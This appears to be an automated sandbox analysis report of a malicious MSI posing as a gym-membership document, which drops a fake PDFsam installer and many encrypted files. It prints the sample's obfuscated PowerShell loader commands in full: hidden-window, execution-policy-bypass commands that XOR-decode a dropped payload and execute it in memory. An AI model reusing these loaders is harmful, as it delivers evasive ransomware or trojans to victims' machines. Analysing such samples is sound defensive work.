                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\UkpPOYBgmRz\fIFzstWXGVUKqZ.vZQDfGTWLkhCIAbi entropy: 7.99760830842Jump to dropped file
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\UkpPOYBgmRz\BDApiSCOqv.dNxUVZSbDsIpYt entropy: 7.99903572395Jump to dropped file
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\UkpPOYBgmRz\mfVTGazKyhAXtCsEn.VSybpexCERAwcY entropy: 7.99896611071Jump to dropped file
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\UkpPOYBgmRz\DpMsTegbJVc.gQhcHOMuET entropy: 7.99831789331Jump to dropped file
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\UkpPOYBgmRz\VLUinDlmkaIWF.YFrIpXlSVUzvPBRmA entropy: 7.99905152811Jump to dropped file
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\UkpPOYBgmRz\jdFnskeygVvUmMCB.FxcvjClqLJwMuZR entropy: 7.9987923596Jump to dropped file
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\UkpPOYBgmRz\WQiMoDsnytOzVGj.ExTuylLpNoadkj entropy: 7.99784944371Jump to dropped file
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\UkpPOYBgmRz\QkNpehbFPBTqcWHD.NeoCKXbxqvtHSyVgM entropy: 7.99829792551Jump to dropped file
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\UkpPOYBgmRz\tAGKNjVqhTwEb.FakNjwdlpGcnJOb entropy: 7.99711123808Jump to dropped file
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\UkpPOYBgmRz\uVhGKWRtUvIMNjdJqF.cejYkFwlDVmxGNdCX entropy: 7.99883837784Jump to dropped file
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\UkpPOYBgmRz\GRQAtexpHVTru.NtlZsKHiDSEnvuQ entropy: 7.99862076797Jump to dropped file
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\UkpPOYBgmRz\bfJvuyYTrXUgLHFiI.mgZFSEtpBiPd entropy: 7.99892325714Jump to dropped file
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\UkpPOYBgmRz\EXzGhdsfHZg.lnIjRsvoNHPMOmct entropy: 7.99899679412Jump to dropped file
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\UkpPOYBgmRz\LuXjgMAUnYZmoxRvp.zcLpVkReTBiDx entropy: 7.99802203684Jump to dropped file
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\UkpPOYBgmRz\tUfqeDLJwTcys.PElvMqFBka entropy: 7.9989439474Jump to dropped file
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\UkpPOYBgmRz\uAgJRrVTxiskym.yEHDLwPJXlWfRjTkUZh entropy: 7.99649854408Jump to dropped file
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\UkpPOYBgmRz\aAKldTqByI.HYTkiUoQzp entropy: 7.99674700451Jump to dropped file
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\UkpPOYBgmRz\krqIJEOnjTWS.rDWMREvyASFjXIa entropy: 7.99894859319Jump to dropped file
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\UkpPOYBgmRz\oVvsglHIGE.ctNTahrQzfFRP entropy: 7.99684129629Jump to dropped file
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\UkpPOYBgmRz\PhpTdsaYUALNiFDIwG.JpUwWdCOQqnhTMXxgbi entropy: 7.9974575038Jump to dropped file
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\UkpPOYBgmRz\QbsAxtYzPFaEySJf.kQirKnpDRZz entropy: 7.9987582428Jump to dropped file
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\UkpPOYBgmRz\qtvATYdjXSFIy.HCenubryVZ entropy: 7.99849908371Jump to dropped file
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\UkpPOYBgmRz\MvdjTgbEaNoiscGDqtn.WONSgaonGDEziy entropy: 7.99829208499Jump to dropped file
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\UkpPOYBgmRz\NzJhdaGvYQIMCWXyVo.abCQEyeiskzcHNr entropy: 7.9988726466Jump to dropped file
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\UkpPOYBgmRz\EfabHONusAFd.OcSYDufXLtTabRBNKhZ entropy: 7.99722233568Jump to dropped file
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\UkpPOYBgmRz\diZbzOSoXpn.yHmFnNkjUBgPV entropy: 7.99876712458Jump to dropped file
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\UkpPOYBgmRz\FoxdBJZvjzOnE.jYgZzfUpAWbcQILqnJk entropy: 7.99641925106Jump to dropped file
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\UkpPOYBgmRz\NsDTEAkUtyzhBJpa.YBGdolRunAaDWCNk entropy: 7.99753019016Jump to dropped file
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\UkpPOYBgmRz\anGipsDqgQuNW.YRCflarIkSXmUFcz entropy: 7.9967665665Jump to dropped file
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\UkpPOYBgmRz\qwNzstjZcGXUn.xSqkTQWuKelAaUpHJL entropy: 7.99853562108Jump to dropped file
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\UkpPOYBgmRz\EoeGVRwyKBasI.fwPjkDqioW entropy: 7.99826657456Jump to dropped file
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\UkpPOYBgmRz\kemKqGFByCbYziINd.PmYSHMGxVyuiF entropy: 7.99887877818Jump to dropped file
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\UkpPOYBgmRz\vSUOMWuGQYjsqoJ.WDPZrHmCNUlxvB entropy: 7.99905545597Jump to dropped file
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\UkpPOYBgmRz\RwXrMTAiyahtEd.XyCGmHiwnWlMOA entropy: 7.99915699654Jump to dropped file
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\UkpPOYBgmRz\lsZtIjvPLeTFONEYoR.QlrbLyCigOvGY entropy: 7.99912735144Jump to dropped file
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\UkpPOYBgmRz\PFeMhnqZuxdjwLs.FwsfCuyJHi entropy: 7.9988958976Jump to dropped file
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\UkpPOYBgmRz\lCBidQIwcZav.zNnsXvMAfcB entropy: 7.99900450167Jump to dropped file
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\UkpPOYBgmRz\yKhcmtGOVHQz.kGhaLzHnKDUvPTgdRm entropy: 7.99711389368Jump to dropped file
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\UkpPOYBgmRz\fJvwzhltKMWAPUDZOq.uBnMoxHGwFJATN entropy: 7.99813299139Jump to dropped file
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\UkpPOYBgmRz\DaBuFCXkip.xlpKmzwdQWNfPJ entropy: 7.99727737475Jump to dropped file
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\UkpPOYBgmRz\dhkaCMvToniNXOjyUze.OnSfPARMCgBeWvsixK entropy: 7.99731686826Jump to dropped file
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\UkpPOYBgmRz\fCrLagBDxmWXKsNZ.CFTfLJWDqKrvVRpeuI entropy: 7.99877236563Jump to dropped file
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\UkpPOYBgmRz\EeGqagumFA.AEtGIWkRbQPrYxHNF entropy: 7.99859448439Jump to dropped file
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\UkpPOYBgmRz\EOgDvVdwRyGq.AGCtoqsYRm entropy: 7.99891315706Jump to dropped file
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\UkpPOYBgmRz\fpAKDIlwxYQ.gWBVKfXIPENehRxkt entropy: 7.99844543031Jump to dropped file
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\UkpPOYBgmRz\AGLbdnliVrfmDtxBhzv.uOqxCwYEIdphnH entropy: 7.99652385717Jump to dropped file
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\UkpPOYBgmRz\nNsJXqaRkFQIVh.repMtLEGluna entropy: 7.9981037189Jump to dropped file
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\UkpPOYBgmRz\xUfXtzWvinO.cgBHhwNMiYqJ entropy: 7.99850960272Jump to dropped file
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\UkpPOYBgmRz\yXGQHJUTtaZwDsgPK.etYhpLgwsBPzWIdG entropy: 7.99712741481Jump to dropped file
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\UkpPOYBgmRz\uPsdWGIbQqVpezZJm.uTXiLqmghdeYBKlk entropy: 7.99730619878Jump to dropped file
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\UkpPOYBgmRz\LnDTWobsjHC.xTrXzAtEpWvI entropy: 7.99908522484Jump to dropped file
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\UkpPOYBgmRz\NwpDsZzxlvWftkb.GPjxFwVuMq entropy: 7.9968363632Jump to dropped file
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\UkpPOYBgmRz\gawkzfVWJebPKtO.qVfZEzLrwWFPKXuBk entropy: 7.99882710841Jump to dropped file
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\UkpPOYBgmRz\lIxrMbusnHJcBoC.xQYIbOmaVzGljUAtpi entropy: 7.99855448718Jump to dropped file
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\UkpPOYBgmRz\lZnrDvVxOWKwa.CtrIMSdDyULzsJFV entropy: 7.99905964163Jump to dropped file
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\UkpPOYBgmRz\oxDHGkPWXzBOvitS.jEBzVfvaCWy entropy: 7.99799970882Jump to dropped file
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\UkpPOYBgmRz\djYBXphMPa.UPBOWgXhIwqTuAxGo entropy: 7.99771937889Jump to dropped file
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\UkpPOYBgmRz\bApIDQShGjqdlWw.naKDegqTjLCPOGiBU entropy: 7.99837587586Jump to dropped file
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\UkpPOYBgmRz\izvsHgjKaODwlLAe.BIinjAgYuOvcbrRhE entropy: 7.999066186Jump to dropped file
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\UkpPOYBgmRz\kZpiRdlxGE.oLGAmQKIJEOC entropy: 7.99853203002Jump to dropped file
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\UkpPOYBgmRz\hXqDYGUnMgWuIlLR.sZnxWdHykgCfDcpKVe entropy: 7.9980611173Jump to dropped file
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\UkpPOYBgmRz\ZtRIfkCwMOyJL.MCVJNRdxSHsOvY entropy: 7.99894056135Jump to dropped file
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\UkpPOYBgmRz\yBdqUfkusbIrSNG.CTnqNUAEuJYpGLaF entropy: 7.99865967011Jump to dropped file
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\UkpPOYBgmRz\AmBuKsoidaTwgDcFe.QlMTbxijnHFgmJYK entropy: 7.9982117393Jump to dropped file
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\UkpPOYBgmRz\DYfgibnQrxLj.hOuIyCYPmXAGUjqLak entropy: 7.99896022976Jump to dropped file
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\UkpPOYBgmRz\rOGQnvNyDXm.GYAkivKUFNltmefhy entropy: 7.99888956702Jump to dropped file
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\UkpPOYBgmRz\EaKbvVgGCzecZ.VDlowjKUnbW entropy: 7.99892996939Jump to dropped file
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\UkpPOYBgmRz\tZWfRzoarqT.MsBODnGxVfFZjQiN entropy: 7.99893902107Jump to dropped file
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\UkpPOYBgmRz\QhgrcMJXSHzINnGbdDT.NVnmCWbAGhrQ entropy: 7.99776775828Jump to dropped file
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\UkpPOYBgmRz\xASXwpkHaBguhUI.piQYzfyXZSBjntbV entropy: 7.99881906242Jump to dropped file
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\UkpPOYBgmRz\jSIcBHGhQXNk.pQrstCqiKoeTbV entropy: 7.99815115203Jump to dropped file
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\UkpPOYBgmRz\xlJMWToIZkXsRyB.ayIRtvqOPVj entropy: 7.99907095854Jump to dropped file
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\UkpPOYBgmRz\ZfrxTeWIsXbjypzJFid.QdkxpCzEYg entropy: 7.99877832613Jump to dropped file
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\UkpPOYBgmRz\rxgqSYbFXufO.gRWDMzZTNHrxBnQGU entropy: 7.99890165652Jump to dropped file
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\UkpPOYBgmRz\zvXKQZSqLfmIYkHorsF.SyKvELgGXcBhboYqjD entropy: 7.99810931983Jump to dropped file
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\UkpPOYBgmRz\RwplegIUuTzoJVExvd.iryKnwxsIA entropy: 7.99906229326Jump to dropped file
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\UkpPOYBgmRz\TMDPfUGCOdpw.mCRoOzBkGQrPAgtNbHd entropy: 7.99781343664Jump to dropped file
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\UkpPOYBgmRz\pqNrZDvUBGJei.TQopRzkgmVJhZD entropy: 7.9980662621Jump to dropped file
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\UkpPOYBgmRz\CujBDfrFwxaX.blogVMOPHDtKfWIGyN entropy: 7.99747176866Jump to dropped file
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\UkpPOYBgmRz\UKhCsubemgyp.UtjOkbCVrGJosyNavYS entropy: 7.99907920302Jump to dropped file

                        System Summary:

                        Source: 00000009.00000003.740405887.000001B512853000.00000004.00000001.sdmp, type: MEMORY Matched rule: SUSP_LNK_SuspiciousCommands date = 2018-09-18, author = Florian Roth, description = Detects LNK file with suspicious content, score =
                        Source: 00000009.00000003.749058298.000001B512853000.00000004.00000001.sdmp, type: MEMORY Matched rule: SUSP_LNK_SuspiciousCommands date = 2018-09-18, author = Florian Roth, description = Detects LNK file with suspicious content, score =
                        Source: 00000009.00000003.739854732.000001B512853000.00000004.00000001.sdmp, type: MEMORY Matched rule: SUSP_LNK_SuspiciousCommands date = 2018-09-18, author = Florian Roth, description = Detects LNK file with suspicious content, score =
                        Source: 00000009.00000003.746350232.000001B512853000.00000004.00000001.sdmp, type: MEMORY Matched rule: SUSP_LNK_SuspiciousCommands date = 2018-09-18, author = Florian Roth, description = Detects LNK file with suspicious content, score =
                        Source: 00000009.00000003.749409808.000001B512853000.00000004.00000001.sdmp, type: MEMORY Matched rule: SUSP_LNK_SuspiciousCommands date = 2018-09-18, author = Florian Roth, description = Detects LNK file with suspicious content, score =
                        Source: 00000009.00000003.750055391.000001B512853000.00000004.00000001.sdmp, type: MEMORY Matched rule: SUSP_LNK_SuspiciousCommands date = 2018-09-18, author = Florian Roth, description = Detects LNK file with suspicious content, score =
                        Source: 00000009.00000003.742546203.000001B512853000.00000004.00000001.sdmp, type: MEMORY Matched rule: SUSP_LNK_SuspiciousCommands date = 2018-09-18, author = Florian Roth, description = Detects LNK file with suspicious content, score =
                        Source: Process Memory Space: powershell.exe PID: 6916, type: MEMORYSTR Matched rule: PowerShell_Susp_Parameter_Combo date = 2017-03-12, author = Florian Roth, description = Detects PowerShell invocation with suspicious parameters, reference = https://goo.gl/uAic1X, score = file
                        Source: C:\Windows\System32\msiexec.exe File deleted: C:\Windows\Installer\MSID20.tmp
                        Source: C:\Windows\System32\msiexec.exe File created: C:\Windows\Installer\5206a8.msi
                        Source: PDFsamEnhanced7Installer.exe.1.dr Static PE information: Resource name: DLL type: PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                        Source: PDFsamEnhanced7Installer.exe.1.dr Static PE information: Resource name: IDT_SZSR type: Zip archive data, at least v2.0 to extract
                        Source: PDFsamEnhanced7Installer.exe.1.dr Static PE information: Resource name: V_D_ARCHIVE type: Zip archive data, at least v2.0 to extract
                        Source: PDFsam_Enhanced_7_Installer.exe.6.dr Static PE information: Resource name: DLL type: PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                        Source: PDFsam_Enhanced_7_Installer.exe.6.dr Static PE information: Resource name: IDT_SZSR type: Zip archive data, at least v2.0 to extract
                        Source: PDFsam_Enhanced_7_Installer.exe.6.dr Static PE information: Resource name: V_D_ARCHIVE type: Zip archive data, at least v2.0 to extract
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process Stats: CPU usage > 98%
                        Source: Nyship-Empire-Plan-Gym-Membership.msi Binary or memory string: OriginalFilenameCustomActions.dll vs Nyship-Empire-Plan-Gym-Membership.msi
                        Source: PDFsamEnhanced7Installer.exe.1.dr Static PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
                        Source: PDFsam_Enhanced_7_Installer.exe.6.dr Static PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
                        Source: C:\Windows\System32\msiexec.exe Section loaded: sfc.dll
                        Source: C:\Windows\System32\msiexec.exe Section loaded: tsappcmp.dll
                        Source: C:\Windows\SysWOW64\msiexec.exe Section loaded: sfc.dll
                        Source: C:\Windows\SysWOW64\regsvr32.exe Section loaded: sfc.dll
                        Source: Nyship-Empire-Plan-Gym-Membership.msi Static PE information: invalid certificate
                        Source: Nyship-Empire-Plan-Gym-Membership.msi Virustotal: Detection: 12%
                        Source: C:\Windows\System32\msiexec.exe Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\SystemCertificates\CA
                        Source: unknown Process created: C:\Windows\System32\msiexec.exe 'C:\Windows\System32\msiexec.exe' /i 'C:\Users\user\Desktop\Nyship-Empire-Plan-Gym-Membership.msi'
                        Source: unknown Process created: C:\Windows\System32\msiexec.exe C:\Windows\system32\msiexec.exe /V
                        Source: C:\Windows\System32\msiexec.exe Process created: C:\Windows\System32\msiexec.exe C:\Windows\System32\MsiExec.exe -Embedding B7C7A506E4E2E0AFFC1F9F29629DA729 C
                        Source: C:\Windows\System32\msiexec.exe Process created: C:\Windows\SysWOW64\msiexec.exe C:\Windows\syswow64\MsiExec.exe -Embedding 9EA879A27423DE072DACED38067EC0CA
                        Source: C:\Windows\System32\msiexec.exe Process created: C:\Windows\System32\msiexec.exe C:\Windows\System32\MsiExec.exe -Embedding 9C2DD99C4B00F4D44E912718317921B1
                        Source: C:\Windows\System32\msiexec.exe Process created: C:\Users\user\AppData\Roaming\PDFsamEnhanced7Installer.exe 'C:\Users\user\AppData\Roaming\PDFsamEnhanced7Installer.exe'
                        Source: C:\Windows\System32\msiexec.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' -ep bypass -windowstyle hidden -command '$xp='C:\Users\user\AppData\Roaming\pdata.txt';$xk='OKqCcHRdijfpJwFXYoITZksyPxUgvDnAezLuESWBMNGQatVhbrlm';$xb=[System.Convert]::FromBase64String([System.IO.File]::ReadAllText($xp));remove-item $xp;for($i=0;$i -lt $xb.count;){for($j=0;$j -lt $xk.length;$j++){$xb[$i]=$xb[$i] -bxor $xk[$j];$i++;if($i -ge $xb.count){$j=$xk.length;}}};$xb=[System.Text.Encoding]::UTF8.GetString($xb);iex $xb;'
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                        Source: C:\Users\user\AppData\Roaming\PDFsamEnhanced7Installer.exe Process created: C:\Windows\SysWOW64\regsvr32.exe regsvr32.exe /s 'C:\ProgramData\PDFsam Enhanced 7\Installation\Statistics.dll'
                        Source: C:\Users\user\AppData\Roaming\PDFsamEnhanced7Installer.exe Process created: C:\ProgramData\PDFsam Enhanced 7\Installation\PDFsam_Enhanced_7_Installer.exe 'C:\ProgramData\PDFsam Enhanced 7\Installation\PDFsam_Enhanced_7_Installer.exe' /RegServer
                        Source: unknownProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe 'PowerShell.exe' -WINDOWsTyLe HIdden -Ep bYPass -CoMmaND '$ac46caf9ffc4c7b839941d3e2c350='QFVuLWVAczZMYUB0QiZiXk5FK1leUlRSPT81TUh2cFBRS1NtV1FKOG4hMjl4Z3I9NEF0ZkdxWHQlI0tLZn14UHt1YX1QVG9+d0BXdjZHPGxsYXopXlIxPGVeb0BhYD1id1Zgc0swXm5nT1FCI3RjLSo3ai1SM01xbVBhQW9gSUN9cDB9e19mUUZwJXJrYlBsai1JbWZ6bFhjPnBOekVlamsxflp1OWQwcmZzQkxqdEQyP3BqLTkzUnl7P3x+ZnVObzl2V2tpR3dTdSh0Z3stPg==';$aae4ceb7c424279fcf464cdcde86d=[sYstem.iO.FIle]::reaDAllbYTes('C:\Users\user\AppData\Roaming\MICroSoFT\UkpPOYBgmRz\KsTLyOZYmIAkr.IKlPnJSyzYBUXe');fOr($aef4ae006e446f92dc4680e0da252=0;$aef4ae006e446f92dc4680e0da252 -LT $aae4ceb7c424279fcf464cdcde86d.count;){For($a4e46636d5944397119672019e333=0;$a4e46636d5944397119672019e333 -LT $ac46caf9ffc4c7b839941d3e2c350.LenGtH;$a4e46636d5944397119672019e333++){$aae4ceb7c424279fcf464cdcde86d[$aef4ae006e446f92dc4680e0da252]=$aae4ceb7c424279fcf464cdcde86d[$aef4ae006e446f92dc4680e0da252] -bxoR $ac46caf9ffc4c7b839941d3e2c350[$a4e46636d5944397119672019e333];$aef4ae006e446f92dc4680e0da252++;IF($aef4ae006e446f92dc4680e0da252 -GE $aae4ceb7c424279fcf464cdcde86d.coUNT){$a4e46636d5944397119672019e333=$ac46caf9ffc4c7b839941d3e2c350.lenGtH}}};[sYsTeM.ReflEcTIon.asseMbLy]::lOAd($aae4ceb7c424279fcf464cdcde86d);[a58b92819f74a08223fbd41c9efcf.a081375717c4dabd0e9d5ff272624]::a2311544abd4fcba55524af320681()'
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                        Source: C:\Windows\System32\msiexec.exe File created: C:\Users\user\AppData\Roaming\PDFsamEnhanced7Installer.exe
                        Source: C:\Windows\System32\msiexec.exe File created: C:\Users\user\AppData\Local\Temp\MSI35C.tmp
                        Source: classification engine Classification label: mal100.rans.troj.evad.winMSI@19/326@2/3
                        Source: C:\Windows\System32\msiexec.exe File read: C:\Users\user\AppData\Local\Temp\cad754e2-de01-4850-9beb-b967743c5645\Repository.ini
                        Source: PDFsamEnhanced7Installer.exe, 00000006.00000002.964756942.0000000001BAD000.00000002.00020000.sdmp, PDFsam_Enhanced_7_Installer.exe, 0000000C.00000002.718421722.0000000000D2A000.00000002.00020000.sdmp Binary or memory string: UPDATE %Q.%s SET tbl_name = %Q, name = CASE WHEN type='table' THEN %Q WHEN name LIKE 'sqliteX_autoindex%%' ESCAPE 'X' AND type='index' THEN 'sqlite_autoindex_' || %Q || substr(name,%d+18) ELSE name END WHERE tbl_name=%Q COLLATE nocase AND (type='table' OR type='index' OR type='trigger');
                        Source: PDFsamEnhanced7Installer.exe, 00000006.00000002.964756942.0000000001BAD000.00000002.00020000.sdmp, PDFsam_Enhanced_7_Installer.exe, 0000000C.00000002.718421722.0000000000D2A000.00000002.00020000.sdmp Binary or memory string: INSERT INTO %Q.%s VALUES('index',%Q,%Q,#%d,%Q);
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: C:\Windows\assembly\NativeImages_v4.0.30319_64\mscorlib\ac26e2af62f23e37e645b5e44068a025\mscorlib.ni.dll
                        Source: Nyship-Empire-Plan-Gym-Membership.msi Static file information: TRID: Microsoft Windows Installer (77509/1) 90.64%
